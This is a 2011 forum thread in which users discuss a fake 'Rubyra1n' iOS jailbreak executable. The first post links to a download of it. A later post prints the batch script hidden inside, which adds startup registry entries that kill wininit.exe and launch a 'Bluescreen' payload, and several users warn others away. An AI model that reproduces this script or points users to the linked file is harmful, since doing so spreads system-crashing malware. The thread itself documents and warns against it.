Rubyra1n.exe... Real??

Discussion in 'Jailbreaks and iOS Hacks' started by phynios, Feb 2, 2011.

  1. phynios macrumors member

    phynios

    Joined:
    Feb 10, 2010
    #1
    Hi guys,

    Maybe one of you can clarify, if you're brave enough to test this, but can this be the real Rubyra1n? I found it simply by searching for 'rubyra1n.exe' in Google. Try it...??

    http://www.mediafire.com/?wcb3umb17lhchgq

    I ran it and it looks like the real thing but I didn't connect my device. I'm not confident enough to try as I'm happy on 4.1jb and have no reason to risk it, but I'd be interested to hear whether or not it can offer untethered jb for 4.2.1...

    Any takers?
     
  2. phynios thread starter macrumors member

    phynios

    Joined:
    Feb 10, 2010
    #2
    You might notice also that this is 3.3MB and Limera1n is only 318KB by comparison... Might be relevant...
     
  3. ACardAttack macrumors 6502

    ACardAttack

    Joined:
    Mar 18, 2010
    #3
  4. localboy28 macrumors 6502a

    Joined:
    Jul 27, 2010
  5. phynios thread starter macrumors member

    phynios

    Joined:
    Feb 10, 2010
    #5
    I saw that. I'd believe it to be genuine only rubyra1n.com isn't live yet. I'd nearly try it...

    @localboy, if you run it, it looks legit...
     
  6. CZK macrumors 6502a

    Joined:
    Oct 25, 2010
    #6
    Prolly a keylogger. Don't touch it.

    e/ i'll open it on someone else's computer lol.
     
  7. Firefox123 macrumors member

    Joined:
    Sep 10, 2009
    #7
    scan it on virustotal.com\
     
  8. Xb0xGuru macrumors member

    Joined:
    Jul 28, 2010
    #8
    I've just extracted the .exe and there's a run.cmd hidden away..

    echo off
    cls
    REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /f "Run1" /d "taskkill.exe /f /im wininit.exe"
    REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /f "Run1" /d "%systemdrive%\rubyra1n\Bluescreen.exe"
    start %systemdrive%\rubyra1n\Bluescreen.exe
    taskkill.exe /f /in wininit.exe
    exit


    There's no reason why your registry should be messed with and you probably want to kill these processes if you ran it. Steer clear.

    EDIT - even curiouser, the Bluescreen.exe file is a self-extracting RAR with blue.exe hidden inside, the content having an INIT with the following line:

    IofCompleteRequest..ntoskrnl.exe

    So 100% positive- DO NOT touch this file.
     
  9. noiceT macrumors 6502a

    Joined:
    Jul 7, 2008
    Location:
    Catalina Wine Mixer
    #9
    How could you ever possibly think this is even slightly legit? Let alone execute it on your computer..:confused:
     
  10. ZilogZ80 macrumors 6502a

    Joined:
    Aug 5, 2010
    #10
    Longing/greed/desperation is pretty effective at clouding judgment :)
     
  11. phynios thread starter macrumors member

    phynios

    Joined:
    Feb 10, 2010
    #11
    Simple. Because there are people genuinely testing Rubyra1n for Geohot, in particular, stability, different iOS versions, etc...
     
  12. WhatAmI macrumors 6502a

    WhatAmI

    Joined:
    Sep 2, 2009
    #12
    ok...
     
  13. phynios thread starter macrumors member

    phynios

    Joined:
    Feb 10, 2010
    #13
    I was just justifying my curiosity! :eek: I can't argue with Xb0xGuru's finding though. I extracted it myself to be sure, so thanks for the feedback. Oh well...

    No harm bringing it to everyone's attention anyway.
     
  14. Steven Jobson macrumors regular

    Joined:
    Jan 13, 2011
  15. phynios thread starter macrumors member

    phynios

    Joined:
    Feb 10, 2010
    #15
    Wow, thank you for your lovely contribution to an otherwise valid discussion?! Aren't you hilarious!! HA HA HA

    Some people find it interesting that there is a mock JB application doing the rounds, and this forum is the perfect place to discuss same.

    Posts like that annoy the ***** out of me. Get off the forum if that's all you can contribute.
     
  16. Maverick1337 macrumors 65816

    Maverick1337

    Joined:
    Nov 4, 2008
    #16
    I wish I could run this .exe file on my Mac.















    /endsarcasm
     
  17. phynios thread starter macrumors member

    phynios

    Joined:
    Feb 10, 2010
    #17
    :) :) :)
     
  18. Maverick1337 macrumors 65816

    Maverick1337

    Joined:
    Nov 4, 2008
    #18
    It's not polite to change things without asking, mister.
     
  19. phynios thread starter macrumors member

    phynios

    Joined:
    Feb 10, 2010
    #19
    Ha ha, I only changed the ':D' smiley to a ':)' as the first one was showing the letter rather than the smiley!! :eek:
     
  20. Xb0xGuru macrumors member

    Joined:
    Jul 28, 2010
    #20
    You can as long as you don't have a PPC Mac. Just install Windows via Bootcamp and do it from there.

    Oh wait - there's no app for it so you might have to click and type a few things first.....

    /sarcasm

    :D
     

Share This Page